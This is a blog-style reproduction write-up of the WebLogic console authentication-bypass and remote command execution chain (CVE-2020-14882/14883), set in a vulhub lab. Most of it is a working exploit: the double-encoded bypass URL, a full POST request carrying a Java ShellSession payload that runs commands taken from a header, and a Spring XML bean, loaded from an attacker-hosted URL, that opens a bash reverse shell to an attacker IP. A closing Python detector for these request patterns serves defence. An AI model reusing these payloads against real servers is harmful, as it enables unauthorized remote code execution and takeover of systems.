WebLogic management console unauthenticated remote command execution vulnerability reproduction (CVE-2020-14882/CVE-2020-14883)

Disclaimer: This article is for learning and reference only. All resources involved in it are from the Internet. Please do not use them for any illegal acts, otherwise you will bear the corresponding consequences yourself, and I do not assume any legal and joint and several liabilities.

Vulnerability description

WebLogic is a J2EE application server from Oracle. In its October 2020 update, Oracle fixed two security vulnerabilities, CVE-2020-14882 and CVE-2020-14883. CVE-2020-14882 lets an unauthenticated user bypass the management console's authentication and reach the admin backend; CVE-2020-14883 lets any user of the backend execute arbitrary commands over HTTP. Chained together, these two vulnerabilities let an unauthenticated remote attacker execute commands on the WebLogic server with a single GET request.

Affected version

WebLogic 10.3.6.0.0
WebLogic 12.1.3.0.0
WebLogic 12.2.1.3.0
WebLogic 12.2.1.4.0
WebLogic 14.1.1.0.0

Vulnerability reproduction

The vulnerability environment is built with vulhub, so I won't repeat the setup here. Once the environment is up, visit http://192.168.10.171:7001/console to reach the backend login page.

Permission Bypass Vulnerability

Visit the URL http://192.168.10.171:7001/console/css/%252e%252e%252fconsole.portal and the management backend page opens without authentication (sometimes the first visit returns a 404; visiting the URL again works). The current user, however, is a low-privileged user who cannot deploy applications or execute commands directly. This leads to the second vulnerability, CVE-2020-14883.

Remote command execution

There are two ways to exploit this vulnerability: one via com.tangosol.coherence.mvel2.sh.ShellSession, the other via com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext.
Using the first method, com.tangosol.coherence.mvel2.sh.ShellSession, the POC is as follows:

POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
Host: 192.168.26.103:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
cmd: whoami
Content-Length: 1258

_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();
weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();
java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");
field.setAccessible(true);
Object obj = field.get(adapter);
weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj);
String cmd = req.getHeader("cmd");
String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};
if (cmd != null) {
    String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next();
    weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req);
    res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));
    res.getServletOutputStream().flush();
    res.getWriter().write("");
}executeThread.interrupt();
");

Reverse shell

Confirm that the reverse shell has connected back

However, this method only works on WebLogic 12.2.1 and above, because the com.tangosol.coherence.mvel2.sh.ShellSession class does not exist in 10.3.6.
com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext is the more universal method; it was first proposed for CVE-2019-2725 and works on all WebLogic versions.

First construct an XML file and host it on a server that WebLogic can reach (for example, start a simple HTTP server with Python on that server):

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
          <list>
            <value>bash</value>
            <value>-c</value>
            <value><![CDATA[bash -i >& /dev/tcp/192.168.8.14/3340 0>&1]]></value>
          </list>
        </constructor-arg>
    </bean>
</beans>

Then, via the following URL, WebLogic loads this XML and executes the command in it:

http://192.168.10.171:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://192.168.8.14:8888/poc.xml")

Confirm that the reverse shell has connected back
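As an added example (not from the original post or from vulhub), a small Python detector that applies the two indicators described above to constructed access-log lines: a request whose literal path sits under the unauthenticated /console/css/ tree but resolves elsewhere after double decoding (CVE-2020-14882), and a handle= parameter naming one of the two gadget classes (CVE-2020-14883). The Common Log Format, sample lines, addresses and the list of unauthenticated static prefixes are assumptions made for this example.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Gadget classes named in the post; a "handle=" naming one of them is the
# CVE-2020-14883 step. The GET variant shows up in the access log; the POST
# body of the first POC does not, so that needs a proxy/WAF that logs bodies.
GADGET_CLASSES = (
    "com.tangosol.coherence.mvel2.sh.ShellSession",
    "com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext",
)
# Console subtrees served without authentication (assumption for this example).
STATIC_PREFIXES = ("/console/css/", "/console/images/")
# Common Log Format: client ident user [time] "METHOD target PROTO" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample lines (addresses and timestamps are made up).
SAMPLE_LOG = """\
10.0.0.5 - - [30/Oct/2020:10:00:01 +0000] "GET /console/css/%252e%252e%252fconsole.portal HTTP/1.1" 200 512
10.0.0.5 - - [30/Oct/2020:10:00:09 +0000] "GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(%22http://10.0.0.9:8888/poc.xml%22) HTTP/1.1" 200 0
10.0.0.7 - - [30/Oct/2020:10:01:00 +0000] "GET /console/css/console.css HTTP/1.1" 200 1024
10.0.0.8 - - [30/Oct/2020:10:02:00 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 2048
"""

def normalized_path(raw_path):
    """Decode twice (%252e -> %2e -> '.') and collapse '..': the path the
    request actually resolves to after the auth check saw the literal path."""
    return posixpath.normpath(unquote(unquote(raw_path)))

def classify(line):
    """Return the parsed request with a list of findings, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    src, method, target, status = m.groups()
    parts = urlsplit(target)
    findings = []
    # Literal path is under an unauthenticated static tree, but the resolved path is not.
    if parts.path.startswith(STATIC_PREFIXES) and not normalized_path(parts.path).startswith(STATIC_PREFIXES):
        findings.append("CVE-2020-14882 path traversal auth bypass")
    query = unquote(unquote(parts.query))
    for cls in GADGET_CLASSES:
        if "handle=" + cls in query:
            findings.append("CVE-2020-14883 gadget " + cls.rsplit(".", 1)[-1])
    return {"src": src, "method": method, "status": status, "findings": findings}

def scan(log_text):
    """Return only the parsed requests that produced at least one finding."""
    hits = [classify(l) for l in log_text.splitlines() if l.strip()]
    return [h for h in hits if h and h["findings"]]
```

Running scan(SAMPLE_LOG) flags the two requests from 10.0.0.5 and leaves the legitimate stylesheet and login-page requests alone.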


Source: blog.csdn.net/guo15890025019/article/details/129460345